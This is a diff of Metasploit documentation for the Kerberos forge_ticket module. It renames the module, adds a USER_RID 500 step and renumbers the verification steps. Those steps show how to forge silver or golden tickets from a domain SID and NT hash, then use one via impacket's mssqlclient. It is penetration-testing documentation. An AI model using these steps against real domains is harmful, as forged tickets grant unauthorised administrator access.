rapid7/metasploit-framework/documentation/modules/auxiliary/admin/kerberos/forge_ticket.md

 ## Verification Steps

 1. Start msfconsole
-2. Do: `use auxiliary/admin/kerberos/forge_kerberos_ticket`
+2. Do: `use auxiliary/admin/kerberos/forge_ticket`
 3. Do: `set DOMAIN DW.LOCAL`
 4. Do: `set DOMAIN_SID S-1-5-21-1755879683-3641577184-3486455962`
 5. Do: `set NTHASH 88E4D9FABAECF3DEC18DD80905521B29`
 6. Do: `set USER fake_user`
+7. Do: `set USER_RID 500`
-7. Do: `set SPN MSSqlSvc/dc1.dw.local:1433` (Option only used for silver tickets)
+8. Do: `set SPN MSSqlSvc/dc1.dw.local:1433` (Option only used for silver tickets)
-8. Do: `forge_silver` to generate a silver ticket or `forge_golden` for a golden ticket
+9. Do: `forge_silver` to generate a silver ticket or `forge_golden` for a golden ticket
-9. Use your ticket which will have been stored as loot with your chosen target
+10. Use your ticket which will have been stored as loot with your chosen target
-10. Example usage in impacket:
+11. Example usage in impacket:
     ```
     export KRB5CCNAME=/path/to/ticket
     python3 mssqlclient.py DW.LOCAL/fake_mysql@dc1.dw.local -k -no-pass